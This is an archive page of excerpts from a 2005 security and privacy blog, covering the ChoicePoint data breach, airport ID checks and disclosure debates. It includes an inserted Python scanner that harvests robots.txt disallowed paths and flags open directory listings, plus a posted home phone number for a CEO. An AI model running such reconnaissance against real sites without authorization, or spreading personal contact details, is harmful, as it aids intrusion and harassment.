Scrivner points out that the Golden Palace is winning all bids to advertise on people’s bodies, and asks “What is all this telling us?” Ummm, Scrivner, it’s telling us…Visit Golden Palace! These foxes are being bred for tameness by scientists in Siberia. (I hope that URL is resilient?) I guess that’s what happens when you’re […]

 

Choicepoint Roundup, March 5

My big question for the day: When Choicepoint announced a re-screening of their small business customers, that segment was 5% of their $900m revenue. Today’s announcement of closing that segment is $15-20m, or about 2%. So it seems that the exceptions that they list in their 8K account for 60% of their small business sales. […]

 

Has Hezbollah Studied Boyd?

Iraq The Model points to this WorldNetDaily article: Designating Hezbollah a terror group in Europe will mean “the sources of [our] funding will dry up and the sources of moral, political and material support will be destroyed,” Nasrallah told Al Manar, Hezbollah’s satellite television station. Boyd discusses war as having moral, mental, and physical dimensions, […]

 

Congrats, Microsoft

“On March 8th, 2005, the Microsoft Security Response Center is planning to release no new security bulletins,” the Redmond, Wash.-based developer said on its Microsoft Security Bulletin Advance Notification Web site Thursday morning. (Via Information Week, via ISN)

 

Choicepoint Roundup, March 4

The focus of today’s roundup is “an object lesson in how not to manage a crisis.” Call Choicepoint CEO Derek Smith at home, 770 667 5775, and tell him what you think. Remember, Atlanta is on Eastern Standard Time. On to the roundup: Not Bad For a Cubicle points out that “This is the first […]

 

Google, Flat Earthers?

I visited maps.google.com, and tried going east from the default view. A press of the “right” button seems to move you about 1,500 miles east. A second press takes you, err, nowhere. Another 16 or so clicks should be bringing you to the West coast of the US, but no luck. (25000 miles/1500 miles per […]

 

Small Bits: Teen Drinking, TSA Databasing, hope, and trust.

This New York Times story discusses the “need” to submit high school students to Breathalyzer tests to ensure they’re not drinking. It’s a good thing we have all those mandatory ID checks. It seems they’re highly effective at stopping teen drinking, so there’s no need for such tests. The TSA is maintaining a secret database […]

 

MMR & Autism

There’s a belief out there that the measles, mumps and rubella (MMR) vaccination is linked to autism, with some scientific sounding hypothesis as to what the causal link is. The BBC is reporting on a study done by Hideo Honda of the Yokohama Rehabilitation Center, along with Yasuo Shimizu and Michael Rutter of the Institute […]

 

Common Vulnerability Scoring System

At RSA, Mike Schiffman presented a Common Vulnerability Scoring System. Brian Erdelyi has taken that, and made a web page to generate numbers. It’s at SecurityHive. (The page requires Javascript be turned on to function.)

 

It's Not About Not Feeling Pain

On Monday, I had the opportunity to see Ed Tufte teach. Much of his analysis revolves around failures to think clearly. Things like poor presentation of data, or selection of data to not include enough context. He said he was in Houston last week, giving a class to the people who were responsible for the […]

 

Astrologers and National ID Cards

I often hear folks who believe in astrology saying things like “That’s just the scorpio in her.” Or, “All Leos act that way.” I rarely hear them say “That’s so unlike a scorpio.” Underlying this is a mind-set which searches for ‘evidence in favor’ of a proposition. This search is a fundamental, and common, misunderstanding […]

 

Small Bits of Chaos: Tempest Tents, Medical Records, Openness

One of the neat things about talking to different sorts of conferences is that you find neat stuff that you don’t otherwise see. At the Southeast Cybercrime Summit, I was supposed to talk about “Reducing Crime In Cyberspace, a Privacy Industry View.” (The talk I used to give for Zero-Knowledge.) Due to a small error […]

 

Gordon on Security

There’s a good interview with Larry Gordon at SecurityPipeline. It came out in April of last year, but I’d missed it. Gordon has hosted the Security and Economics workshop. “I go to security conferences where we all sit around puzzling about what kind of metrics to use for measuring the results of security programs,” says […]

 

500th Post

In the 195 days since I started this blog, I’ve posted 499 times: This is the 500th. I’d planned, when I started, for about one long post a day. It hasn’t always worked that way. I’m posting slightly more than 2.5 posts a day. I think I’m now getting more comments than I post, but […]

 

(T)ourism (S)uppression (A)gency

Webflyer has a good post about the economics of new security rules that the TSA wants to impose: Requiring information to be submitted an hour before flight takeoff involves a full 75 minutes greater notice than currently provided. This will mean passengers turning up at the airport at least an additional hour in advance of […]

 

Choicepoint Roundup (1 March)

KnobBoy, demonstrating that the new media can do research, points out that Choicepoint execs didn’t trade like that before. In an AP Interview, Choicepoint CEO “Smith said he believes his company is as much a victim in the episode as the roughly 145,000 Americans whose personal information may have been viewed by criminals.” The Los […]

 

Software Liability by Contract, Not Regulation

While “other events” are causing me to prevaricate over data protection legislation in the US, it’s great to see this Wall St Journal story (reprinted in the Contra Costa Times) on large software buyers pushing for liability clauses in their contracts. “I’m paying the bill. Other companies are paying the bill,” says Ed Amoroso, AT&T’s […]

 

Emergent Chaos Choicepoint Posts

I have added a Choicepoint category, which is great if you want to see all my posts on Choicepoint on one long page, and I am no longer updating this roundup. I’ve been posting a lot on Choicepoint. I’ve done a number of roundup posts listing things I find interesting around the web, and a […]

 

Choicepoint Roundup ($16,600,000 edition)

Having already posted a Feb 28th roundup a day early, I was forced to think about a new title for today’s edition, and what better than the $16.6 million dollars that ChoicePoint CEO Derek Smith and President Douglas Curling have made selling 472,000 shares of CPS since the day before the first arrest in the […]

 

Choicepoint Roundup (Feb 28)

I accidentally published this too early, but given the nature of trackbacks, and other such privacy-invasive technologies, its too late. You know my secret. I accumulate and then (try to) post in the morning. Midnight Special asks “Where’s the accountability” and talks about government outsourcing and incentives in a well written post. Why Now has […]

 

Publishing a List of SSNs Will Not Fix Anything

Pete Lindstrom suggests: My proposal: List SSNs publicly. The Social Security Agency can notify all of its intent to publish all SSNs at some point in the future – enough time for organizations to absorb and react to this news. The net result is to eliminate the notion that perhaps SSNs are “secure enough” for […]

 

Good Folks Looking for Help

A group that wants to assist free speech in authoritarian nations is looking for a technically savvy person — a CTO or lead engineer type — who can do a short term study, possibly leading to a longer-term job. This is a paying gig for the right person. The project is intended, in its initial […]

 

Choicepoint Roundup for Today (27 Feb)

Choicepoint doesn’t make an appearance in the June, 2003 Congressional testimony of Leonard Bennett, (or PDF), but the testimony is on how hard it is to get your credit files corrected with those companies that follow the Fair Credit Reporting Act. Given that Choicepoint believes that they don’t even have to do that, it will […]

 

Choicepoint's Orientation

As Choicepoint’s little error threatens to grow into a full-blown scandal, with Attorneys-General posturing, Congressional hearings, and daily press coverage in every state of the Union, it may be worth stepping back, and asking, “Why is this happening?” It’s not just the size of the exposure, both Bank of America and PayMaxx are larger. It […]

 

Choicepoint Won't Benefit from Bank of America Leak

I wasn’t going to blog on BofA‘s little kerfuffle. But then Ian went and blogged about it, and I think he gets it partially right and partially very wrong. His actual conclusion is spot on: In order to share the information, and raise the knowledge of what’s important and what’s not, we may have to […]

 

What's with this Dialog?

This dialog box is modal. It has no “take me there” button. Even having taken notes, I couldn’t figure out how to follow the instructions. You can “clear formatting” and make spell checking work again. A double-feh at Redmond. I take back all the mean things I said about Firefox this morning.

 

Two Minutes Hate

So everyone seems to be accepting at face value the claim that Choicepoint was scammed by Olatunji Oluwatosin and colleagues not yet named. But let’s step back, and ask, was there a scam? Why did these folks need to cheat? Was it habit, or necessity? What was really needed to get a Choicepoint account of […]

 

Quick Followups

David Akin says CIBC is getting sued for faxing information around. Prior posts are “Privacy Lessons from CIBC and Canadian privacy law & CIBC. 19 days after the vulnerability was announced, Mozilla releases Firefox 1.01.

 

Choicepoint Roundup for Today

The Associated Press has a story “Burned by ChoicePoint breach, potential ID theft victims face a lifetime of vigilance” (actually, we all face a lifetime of vigilance, as these companies make buckets of money by gossiping about us.). The money quote: Many victims are dumbfounded by the dearth of federal and state laws aimed at […]

 

Roger McNamee on Sarbox

Roger McNamee has an article on how Sarbanes-Oxley is hurting public companies by making their guidance more conservative than it should be. It’s hard for executives to avoid providing some form of guidance – investors generally insist on it – but they have a big incentive to understate the outlook early in the fiscal year. […]

 

Finding Security Issues

In Today’s Choicepoint Roundup, I mentioned that Richard Smith had found a number of issues with Choicepoint’s web sites. In discussion, Richard told me that the issues included (but were not limited to) robots.txt files and directory listings enabled. The robots.txt standard is a way to tell search engines “please don’t go here.” That’s useful, […]
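The two findings mentioned above combine naturally into one check: the paths a robots.txt file asks crawlers to stay away from are exactly the paths worth looking at for auto-generated directory indexes. The script below is an added example, not code from the original post or from Richard Smith’s review of ChoicePoint’s sites. The robots.txt text, the hostname www.example.com and the HTML response bodies are constructed for illustration; a real run would swap `sample_fetch` for an HTTP client, and should only be pointed at sites you are authorized to test.

```python
"""Harvest Disallow paths from robots.txt and flag any that return an
auto-generated directory listing.

Added example; not code from the original post or from ChoicePoint.
All inputs below (robots.txt text, URLs, HTML bodies) are constructed.
"""
import re
from urllib.parse import urljoin

# Constructed robots.txt, standing in for a fetched /robots.txt.
SAMPLE_ROBOTS = """# constructed for illustration
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /cgi-bin/
Allow: /public/
Sitemap: https://www.example.com/sitemap.xml
"""

# Constructed response bodies keyed by URL, standing in for HTTP GETs.
SAMPLE_RESPONSES = {
    "https://www.example.com/admin/": "<html><body><h1>Login</h1></body></html>",
    "https://www.example.com/backup/": (
        "<html><head><title>Index of /backup</title></head><body>"
        '<h1>Index of /backup</h1><pre><a href="db.sql">db.sql</a></pre>'
        "</body></html>"
    ),
    "https://www.example.com/cgi-bin/": "<html><body>Forbidden</body></html>",
}

# Markers emitted by common servers when auto-indexing is enabled:
# Apache/nginx ("Index of /x"), IIS ("[To Parent Directory]"),
# Tomcat ("Directory Listing For").
LISTING_RE = re.compile(
    r"<title>\s*Index of\s|<h1>\s*Index of\s|\[To Parent Directory\]|Directory Listing For",
    re.IGNORECASE,
)


def disallowed_paths(robots_txt):
    """Return the Disallow values from robots.txt, in order, without duplicates."""
    seen, paths = set(), []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and whitespace
        if ":" not in line:
            continue
        field, value = line.split(":", 1)
        if field.strip().lower() != "disallow":
            continue
        path = value.strip()
        if path and path not in seen:  # an empty Disallow means "allow all"
            seen.add(path)
            paths.append(path)
    return paths


def looks_like_directory_listing(html):
    """True if the body carries one of the known auto-index markers."""
    return bool(LISTING_RE.search(html))


def find_open_listings(base_url, robots_txt, fetch):
    """Return the disallowed directory URLs whose bodies look like listings.

    `fetch(url)` must return the response body as str, or None on failure.
    """
    hits = []
    for path in disallowed_paths(robots_txt):
        if not path.endswith("/"):
            continue  # only directory paths can be auto-indexed
        url = urljoin(base_url, path)
        body = fetch(url)
        if body is not None and looks_like_directory_listing(body):
            hits.append(url)
    return hits


def sample_fetch(url):
    """Offline stand-in for an HTTP GET against the constructed responses."""
    return SAMPLE_RESPONSES.get(url)


if __name__ == "__main__":
    for hit in find_open_listings("https://www.example.com/", SAMPLE_ROBOTS, sample_fetch):
        print("open directory listing:", hit)
```

The point a reviewer should take from this is the one the post makes: robots.txt is a request to well-behaved crawlers, not an access control, so listing a path there advertises it to anyone who reads the file, and a directory with indexing enabled then hands over its contents without any further guessing.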

 

Small Bits of Chaos: Conferences and What Would Dylan Do?

This Concealed I conference in Ottawa March 4-5 looks really good. Bob Dylan joins the cypherpunks in skipping Woodstock for his trig homework: “I wouldn’t even think about playing music if I was born in these times… I’d probably turn to something like mathematics.” (NME, via Scrivner.) Who did this: Privacy Enhancing Technologies, May 30-June […]

 

Today's Choicepoint Roundup

The Privacy Rights Clearinghouse has an extensive sheet on what to do if you’re a victim of Choicepoint’s failure to secure data. SoftReset calls for banning the use of SSNs for non-government purposes. I take a slightly more moderate view: Anyone using the SSN is already subject to GLB liability. Random Thoughts on Politics comments […]

 

Disclosure and PayMaxx

There seems to be a bit of a spat going between PayMaxx, and ThinkComputer (who may have the worst web site I’ve tried to view in a long time). As documented by Robert Lemos at Ziff-Davis: Greenspan, a former PayMaxx customer, said he discovered the alleged problems in the company’s system more than two weeks […]

 

Oh, there it is.

Back in October, I asked, “where’s the 8-in-1 media reader to take photos directly from your camera.” From today’s Apple press release: The new iPod Camera Connector is an optional accessory that enables customers to connect their digital camera to iPod photo and import their photos into the iPod. By simply connecting the iPod Camera […]

 

When The Future Has No Shadow

I remember when I was in college, discussing what we’d do if we discovered we had a terminal disease. Being college students, there were lots of ways to maximize short-term fun before the disease ate you. The game theory folks talk about “the long shadow of the future,” the idea that cooperation can be rewarded […]

 

Today's Choicepoint Roundup

Google is running an ad when you search on Choicepoint: “ChoicePoint letter says your identity stolen? Learn your rights. www.jameshoyer.com” On clicking through, it’s just a form, asking someone to contact you. Renaissancemen has a good roundup, including the fact that only 5% of perpetrators are arrested, and a pointer to Kevin Drum arguing for […]

 

More on Choicepoint

Enter ChoicePoint’s two-building campus in Alpharetta, and you get the feeling you are being watched. starts a new story at the Atlanta Journal-Constitution. (Use Bugmenot to login.) It’s sort of ironic. Choicepoint is focused on identifying people, rather than identifying behavior that leads to trouble. They figure once you have an account, they want you […]

 

The Open Passport

Third, this may be all moot if the government takes the easy step of giving citizens a passport cover made of aluminum foil. According to one article “Even Schneier agrees that a properly shielded passport cover should solve the problem. He wonders why this wasn’t included in the original plans for the new passports.” writes […]

 

Cool Tech at RSA: i-Mature

At RSA, I didn’t get a demo, but did talk to John Brainard of RSA about i-Mature, a fascinating biometrics company. There’s been some discussion on Interesting People. Vin McClellan discusses the tech, Seth Finkelstein maps their web site, reporter Andy Sullivan plays with one, Lauren Weinstein on probable attacks, Herb Lin on the limits […]

 

Small Bits of Chaos: Passports, Financial Crypto

Ryan Singel has a good post on chipped passports: Bailey is right that the new passport will be harder to forge with the inclusion of RFID chips, especially since the chip would be digitally signed to prevent changes to the data in the chip. That’s a solid security measure. But, the chips create a new […]

 

Free Mojtaba and Arash!

Sending people to jail for expressing their opinions is wrong. In the west we’ve understood why it was wrong since John Stuart Mill wrote On Liberty. So please, for the betterment of Iran, and the entire world: Mojtaba and Arash are Iranian bloggers jailed for their ideas. What ideas is almost not relevant. Even if […]

 

Cool Tech At RSA

One of the best bits at RSA was at the HP booth. Marc Stiegler, Alan Karp, Ka-Ping Yee and Mark Miller have created Polaris, a system for isolating and controlling untrustworthy code on Windows. The white paper is here. It’s very simple, easy, and looks like a winner. I hope they find a way to […]

 

Security So Good, No One Could Login

One of the ironic bits about the RSA conference was the wireless network. Your username was your email and the password was on your badge. However, I had trouble logging in, so they gave me this username and password. I’m pretty sure that they didn’t record who I was as they did it. Even once […]

 

Hunter S. Thompson, 1937-2005

Hunter S. Thompson killed himself last night. While I enjoyed his books, for me, his ultimate work wasn’t reading about times I hadn’t experienced, but when his writing was live and raw, about the day, when he wrote the definitive obituary of Richard Nixon. He’s gone, and I am poorer for it.

 

Openness: Maps

After RSA, some friends and I went up to Russian River. I was looking at some old maps at the Quinvera Quivira Vineyard, and the caption under one said “The author of this map is believed to have had access to Drake’s secret maps.” Today, large scale maps of everywhere are easily available. But there […]

 

Small Bits on Programming

Max Dornseif asserts it’s easy to find bugs. (Perhaps even easier than figuring out trackbacks for his blog?) In an article in ACM Queue, Ioannis Samoladas, Ioannis Stamelos, Lefteris Angelis, Apostolos Oikonomou examine some measures of code quality between open and closed source apps.

 

What do Apple's Common Criteria Tools Do?

Apple has made available a set of “Common Criteria” tools. The “evaluation” page is here. The evaluation criteria is “EAL 3, CAPP, version 1.d, October 8, 1999.” (The README is a bit better.) If anyone would care to explain to me what I’ve just said, or, really, what the tools package does, I’d be much […]

 

Small Bits: T-Mobile, Google, Passports, Terrorism

Jack Koziol has a long post on security issues with T-Mobile’s web site. (Via /.) Did you know that Google’s “Dissatisfied? Help us improve” link only appears on the first page of a search? That’s fascinating–they expect their search to be so good that they get what you want on page 1, and you’ll complain […]

 

An Open Society?

Eric Rescorla discusses this account: Officer Primiano expressed extreme frustration with me as soon as I began speaking of my rights to photograph in public places. She wanted to debate the wisdom of my taking pictures and asserted that in the wake of the Sept 11th attacks on our country, I should be more interested […]

 

Two More on Choicepoint

See Taosecurity, on IDS and Choicepoint, and this choice excerpt from Reuters, relayed by Dave Evans at Corante’s Online Dating: U.S. investigators notified the company of the breach in October, but ChoicePoint did not send out the consumer warnings until last week. It’s fascinating that the company didn’t detect the breach, and that they seem […]

 

More on Choicepoint

The Atlanta Journal Constitution (use Bugmenot) reports: “We know that there is a national number that is much larger than that,” said Lt. Paul Denny of the [Los Angeles County] sheriff’s department. “We’ve used the number 400,000, but we’re speculating at this point.” Executives at ChoicePoint, which maintains one of the largest databases of personal […]

 

Felten on The Record Industry

Ed Felten has a great post today, asking “How Competitive Is the Record Industry?” How can we tell whether the record industry is responding competitively to DRM? An interesting natural experiment is about to start. MP3Tunes, a new startup headed by serial entrepreneur Michael Robertson, is launching a new music service that sells songs in […]

 

More on Fighting Terrorist Ideas

I liked how my previous post on this subject read. It was very positive, and I like being positive about the future. (I’m not very good at it.) However, there’s a contrast which needs to be drawn, between the way Yemen (Yemen? Yemen!?!) is handling some prisoners and the way the US is handling some […]

 

How Many Choicepoint Victims Are at Risk?

Choicepoint is a large credit bureau who denies being one. Yesterday, MSNBC reported that “more than 30,000 Californians” had been notified of problems. Now, no one opts-in to Choicepoint. No one can opt-out. They maintain files on you without your knowledge or permission. Now we know that at least 30,000 people were put at risk […]

 

The Real-ID Theft Act of 2005

The “Real ID” act is likely to get written into law, in two ways. First, it will pass the Senate, and be signed into law. Second, it will be one of the best examples of the law of unintended consequences in a long time. The bill would force states* to fingerprint people, and do various […]

 

JAG Heroics

Michael Froomkin applauds those “Military lawyers at the Guantanamo Bay terrorist prison tried to stop inhumane interrogations, but were ignored by senior Pentagon officials.”

 

Purpose of a System Is What it Does?

Over at POSIWID, Richard comments on airline security, with some economic analysis of bad security and why it stays around. (I think I don’t like his title, preferring ‘systems are maintained for what they do,’ which gives more credit to the emergent qualities of systems, but I digress.) He accurately assesses some positives of the […]

 

Dave Eggers and the Pirate Store

By reading this post, you agree not to do anything to get the author or Dave Eggers in trouble, even if those actions that lead to trouble are entirely their own, and you’re just commenting on them, even in a sort of approving way that happens to continue the unfortunate chain of events that were […]

 

What Did TSA Know, and When Did They Know It?

Recently, Slate had an article on how to alter your boarding passes and bypass the silly watch lists. It was picked up by BoingBoing, and it turns out that Bruce Schneier talked about it 18 months ago. Recently, I was talking to a friend who started telling me about…how to alter your boarding passes. What […]

 

Proof Of Concept Code, Boon or Bane

Microsoft has come out swinging against researchers who publish code: Microsoft is concerned that the publishing of proof-of-concept code within hours of the security updates being made available has put customers at increased risk. A common practice among responsible researchers is to wait a reasonable period of time before publishing such code. This generally accepted […]

 

Charlie Wilson's War

I’ve recently finished Charlie Wilson’s War, which Jeff Moss suggested to me. Charlie Wilson was a Congressman from Texas. Gust Avrakotos was a CIA officer. Together, they conspired to get hundreds of millions of dollars funneled to the Afghanistan resistance. The story is simply astounding–at times you think this can’t be true, but it all […]

 

US National ID Card

This was first created in December 2004’s Intelligence bill, loosely called the Patriot II act because it snuck in provisions like this without the Representatives knowing it. The deal is basically a no-option offer to the states: either you issue all your state citizens with nationally approved cards, or all federal employees are instructed to […]

 

Could We Trade Judges?

NPR is reporting that The Bush administration is seeking to justify the imprisonment of an American citizen using secret evidence. The Justice Department has asked a federal judge to throw out the case based on evidence that is being withheld from the man’s lawyers. Perhaps we could trade judges with Yemen. (Via Hit & Run.) […]

 

Security Planning

Gunnar Peterson (who has a new blog) points to the public release of the worksheets from “Mission Critical Security Planner.” I haven’t read that book, but the worksheets look like useful planning documents.

 

Fighting Terrorist Ideas

I believe that the Wahhabi-inspired terrorist strain of Islam represents a great material danger to the ideals of liberty and equality, as well as to free inquiry and science. (The state’s response to this danger also creates a great threat to those goods.) It is thus a pleasure to see a Yemeni judge taking to […]

 

Small Bits of Chaos: How to Present, ID Theft Victims List

higB at secureme has good advice for presenters at security cons. Ian G has a good post explaining that government only illegally links their databases when they want to, not when it could help the citizenry. No privacy story is ever truly complete without a tool of the man talking out both sides of their […]

 

Shmoocon Slides

At Shmoocon, Crispin Cowan, Ed Reed, Al Potter and I ran a BOF entitled “Evidence Based Security.” The feedback I got from the audience was all positive. I was hoping that things would have gone more towards the question of what is good evidence, and how you evaluate questions, but that’s the joy of you […]

 

Wachovia Misdirects Customer Information

Wachovia said that, overall, 86 statements or tax forms were mistakenly sent to Pirozzi, including information on 73 individuals. Pirozzi said the number of pieces of mail was significantly higher, closer to 140. … Pirozzi tried desperately to get the problem fixed once the first batch arrived last spring, but he says that no one […]

 

Good Thing We're Checking IDs

Normally, I try hard to bring you only the freshest news. This has been all over the blogosphere, but I can’t resist: Slate on bypassing airport ID checks. [Other commentary on why they’re bad in the “air travel” category of this blog. Are you listening, David Nelson?]

 

Stefan Brands Blogging

Stefan Brands has a new blog. Stefan is not only one of the top two or three folks in the world in privacy enhancing cryptography, but he writes eloquently about the social reasons privacy is important. We worked together at ZKS, and I’m very sad we didn’t get further selling his technology. I look forward […]

 

SSNs and Drivers Licenses

JihadWatch is upset because (9/11 hijacker) Nawaf Alhazmi got a CA drivers license with a fake SSN. But so did 184,000 other people, most of whom have not turned terrorists. Perhaps we should focus on things other than SSN fraud in tracking down terrorists?

 

Top 30 Papers in Infosec

Max Dornseif has a post titled “Top 18 Papers in Information Security,” with 28 papers. But who’s counting? It’s a fascinating exercise, and I’m glad to see papers from Phrack. I’d suggest that they define top: Most influential? Most cited? Most important? I do think that no paper which isn’t available to the public via […]

 

Liveblogging Shmoocon: Patching

I’m at Shmoocon, and trying to liveblog a little. There’s network trouble, so it may not quite be live. I’m at Tina Bird’s talk on patching, and she mentioned that in the Teragrid attack, the attackers were hitting supercomputer centers, and there’s some evidence that they were 1) using 0day and 2) using the big […]

 

Vaclav Havel on the EU

For some reason, enemies of Václav Havel want him to waste his astounding moral authority by becoming Secretary General of the UN. I prefer he remain a private citizen, where there is nothing to hold him back from this most elegant dressing down of the European Union: I vividly remember the slightly ludicrous, slightly risqué […]

 

CEOBlogger on "IT Propaganda"

There’s a new blog, from a fellow claiming to be the CEO of a public company, experimenting with blogging. Welcome! In his second post, he responds to the WikID Thoughts, Emergent Chaos, Financial Crypto series on IT breaches, calling it an example of “IT Propaganda.” I love the ‘IT propaganda’ phrase–one of the themes that […]

 

Small Bits: ICANN, Mock Trials, S.116, etc

Ian Grigg and I have a letter to ICANN about Verisign. See his post. Eric Rescorla has a Kafka-esque excerpt from the “trial” of Mustafa Ait Idr, who wasn’t allowed to see the evidence against him. Mort points me to US Senate Bill S.116, introduced by Dianne Feinstein, making it a crime to sell social […]

 

A Few Ideas Connected by the Tag "Folksonomy"

Nude Cybot, in an email in which he promises to emerge soon, presumably to be exceptionally cold, mentions that folksonomies have hit Wired News. The Wired article points out that there are more “cat” (16,297) tagged images than “dog” (14,041) in Flickr. But the conclusion they draw from this, “If the photo-sharing site Flickr is […]

 

Eating Your Own Dogfood?

Two posts this morning grabbed my attention. They are “Hide Your Ipod, Here Comes Bill,” (at Wired) and “Sanyo asks workers to buy goods to ease loss” (Hindustan Times via BoingBoing.) In a presentation at Belisarius.com, Chet Richards applies Boyd to business. One of his suggestions, which isn’t new, is to get inside the mind […]

 

Sarbox and Venture Capital

The Sarbanes-Oxley act is driving up the costs of being a public company. It’s driving up both direct costs, in terms of investing in assurance technologies, audit, and new processes to produce (slightly) more reliable accounting. But much more important, it imposes a highly risky cost on CEOs and financial officers who must sign off […]

 

Small Bits: Research, Web Security, Saturn's Moon

Uncle Sam is trying to restrict basic research. This approach comes from such a foreign orientation I’m not even going to comment. Jeremiah Grossman has an article on easy things to do to protect your locally developed application. I still think you should look at your code, but that’s still unfortunately expensive and difficult. Finally, […]

 

Privacy and Obscenity?

Put bluntly, the law of obscenity, no matter how longstanding, has never satisfied constitutional requirements, and it never will. Finally, a judge has been brave enough to say as much. This opinion is notable for that reason – and for Judge Lancaster’s novel approach. His opinion attacks the obscenity laws on privacy grounds – and […]

 

Small Bits of Irony: Secure Flight, Insecure Borders

Bruce Schneier talks about Secure Flight being an improvement over the current watchlist system, but can’t give us details. The new system will rely on more information in the reservation. But if we don’t have that more information on the person on the watchlist, what will happen? E.g., if there’s no known birthday for […]

 

More on Nothing to Hide

Chapell points out a very interesting correction at the top of this Seattle Times story: A previous version of this story on Tukwila firefighter Lt. Philip Lyons being charged with first-degree attempted arson incorrectly stated that police reports indicated he had used his Safeway Club Card to purchase 16 fire-starters between June and August. Lyons […]

 

Small Bits of Hope

Some moving blog posts from Iraq include Hammorabi, Messopotamian, and Iraq the Model: The first thing we saw this morning on our way to the voting center was a convoy of the Iraqi army vehicles patrolling the street, the soldiers were cheering the people marching towards their voting centers then one of the soldiers chanted […]

 

Good Luck to Iraqis!

In tomorrow’s elections. I have to say that despite a great deal of skepticism in the feasibility, and disappointment over the execution, of Bush’s vision for the Middle East, it represents one of the core American beliefs. Lincoln called the ideas of democracy the last, best hope of mankind, and in that, he was […]

 

New York Times Links

Aaron Swartz has produced a link generator for the New York Times. It takes a URL and makes it archival, so that it doesn’t expire, and you should be able to visit it after two weeks are up. It's a lazy Saturday afternoon; Atlanta is shut down by the half inch of snow that fell […]

 

More on Economic Analysis of Vulnerabilities

Dave Aitel has a new presentation (“0Days: How Hacking Really Works“) on what it costs to attack. The big cost to attackers is not vulnerability discovery, but coding reliable exploits. (There’s an irony for you: Attackers are subject to the same issues with bad software as their victims.) The presentation is in OpenOffice format only […]

 

Small Bits of Chaos: Vidal, SP2, Iraq

Gore Vidal has a few choice words about the President’s Inaugural address, at DemocracyNow. A Russian company, MaxPatrol, has published a paper on bypassing heap and stack protection for Microsoft Windows XP with SP2. Winterspeak has an interesting summary of Iraq: The big bet that President Bush placed all these months ago, the bet that […]

 

Nothing to Hide, Plenty to Fear

Longtime security and privacy researcher Richard M. Smith tells Farber’s IP list about Philip Scott Lyons, a Tukwila, Washington firefighter. Lyons was accused of arson because he’d bought the same type of fire starters at Safeway. Or, that’s what Safeway’s “Club Card” records show. How or why they were obtained isn’t clear. The charge was […]

 

"Analysis of the Texas Instruments DST RFID"

A group at Johns Hopkins and RSA Security has interesting new attacks on the RFID chips used in Mobil Speedpass. They’ve put up a web site at http://www.rfidanalysis.org, and gotten some press at the New York Times. [Edited 29/4/2017 to unlink RFIDanalysis.org because Google claims it's distributing malware.]

 

Folksonomies, Tested

I’ve just stumbled across this abstract comparing full-text searching to controlled vocabulary searching. The relevance to Clay’s posts on controlled vocabularies is that our intuitive belief that controlled vocabulary helps searching may be wrong. Unfortunately, the full paper is $30; perhaps someone with an academic library can comment. …In this paper, we focus on an experiment […]

 

Small Bits of Chaos: Brazilian Democracy, Traffic Cameras, Locks, Hamas, and Curtains

Lessig discusses what democracy looks like in Brazil: I remember reading about Jefferson’s complaints about the early White House. Ordinary people would knock on the door, and demand to see the President. Often they did. The presumption of that democracy lives in a sense here. And you never quite see how far from that presumption […]

 

"The Arthur Andersen Of Banking?"

Over at The CounterTerrorism Blog, Andrew Cochran accuses Riggs Bank of being “the Arthur Andersen of banking.” Riggs is apparently pleading guilty to violating the Bank Secrecy Act, by “failing to file reports to regulators on suspicious transfers and withdrawals by clients.” I’d like to address the comparison to Arthur Andersen, and through that lens, […]

 

Small Bits of Chaos: Taxes, Orientation, Liberty, Fraudulent Licenses

Scrivner writes about the perverse nature of the AMT. Chuck Spinney at D-N-I asks “Is America Inside Its Own OODA Loop?” The article contains some very clear writing on the meaning of orientation, and applies that idea: He showed why the most dangerous internal state of an OODA loop occurs when the Orientation process becomes […]

 

Ben Rothke on Best Practices

Best practices look at what everyone else is doing, crunch numbers—and come up with what everyone else is doing. Using the same method, one would conclude that best practices for nutrition mandates a diet high in fat, cholesterol and sugar, with the average male being 35 pounds overweight. Writes Ben Rothke in a short, incisive […]

 

Towards an Economic Analysis of Disclosure

In comments on my post yesterday, “I Am So A Dinosaur“, Ian asks “Has anyone modelled in economics terms why disclosure is better than the alternate(s)?” I believe that the answer is no, and so will give it a whack. The costs I see associated with a vulnerability discovery and disclosure, in chronological […]

 

I Am So A Dinosaur…

…and I was one before it was cool. Crit Jarvis responds to my comment that my views on disclosure have ossified by claiming that I’m evolving. The trouble is, I have documented proof it’s not true. From my homepage: Apparent Weaknesses in the Security Dynamics Client Server Protocol. This paper was presented at the DIMACS […]

 

Patterns of Conflict, Easier on the Eyes

I’ve been posting a fair bit about Boyd. Boyd wrote very little. Most of his communication was in the form of briefs. At least two of you have publicly admitted to getting the slides, and, if you’re like me, struggled with the form of the presentation: A scan of a typed, hand-annotated presentation book. There’s […]

 

More on Do Security Breaches Matter?

In responding to a question I asked yesterday, Ian Grigg writes: In this case, I think the market is responding to the unknown. In other words, fear. It has long been observed that once a cost is understood, it becomes factored in, and I guess that’s what is happening with DDOS and defacements/viruses/worms. But large […]

 

Small Bits of Chaos: Blind overflows, National ID, and Looney Tunes

SecurityFocus has a new article on blind buffer overflows. I’m glad these techniques are being discussed in the open, rather than in secret. Julian Sanchez has the perfect comment on Congressman Dreier’s new national ID plan, at Hit & Run. And finally, don’t visit this Looney Tunes site if you’re busy. (Via Steven Horowitz at […]

 

Do Security Breaches Matter?

Nick Owen posts about the stock valuation impact of security breaches. This UMD study found that a firm suffering a breach of ‘confidential information’ saw a 5% drop in stock price while firms suffering a non-confidential breach saw no impact. I read it as the market over time learning the difference between a DOS attack […]

 

Catastrophe and Continuation

Dr. David Ozonoff, a professor of environmental health at the Boston University School of Public Health who originally supported the new laboratory but now opposes it, argues that biodefense spending has shifted money away from “bread-and-butter public health concerns.” Given the diversion of resources and the potential for germs to leak or be diverted, he […]

 

California Privacy Law

CIO Magazine has an article “Riding The California Privacy Wave,” reviewing California’s new and pending privacy laws. There are bits I wasn’t aware of, such as SB 186 168, preventing “businesses from using California residents’ Social Security numbers as unique identifiers.” There’s a slew of new laws in California, a great many of which affect IT […]

 

Economics of Taxonomies

In his latest post on folksonomies, Clay argues that we have no choice about moving to folksonomies, because of the economics. I’d like to tackle those economics a bit. (Some background: There was recently a fascinating exchange between Clay Shirky and Louis Rosenfeld on the subject of taxonomies versus “folksonomies,” lightweight, uncontrolled terms that users […]

 

Mac Software: Memento

Memento is an application that helps you find web pages you’ve stumbled across and forgotten where the site is. It does this by searching the cache (copies that Safari keeps locally). Very cool, and free.

 

Congrats to David Akin

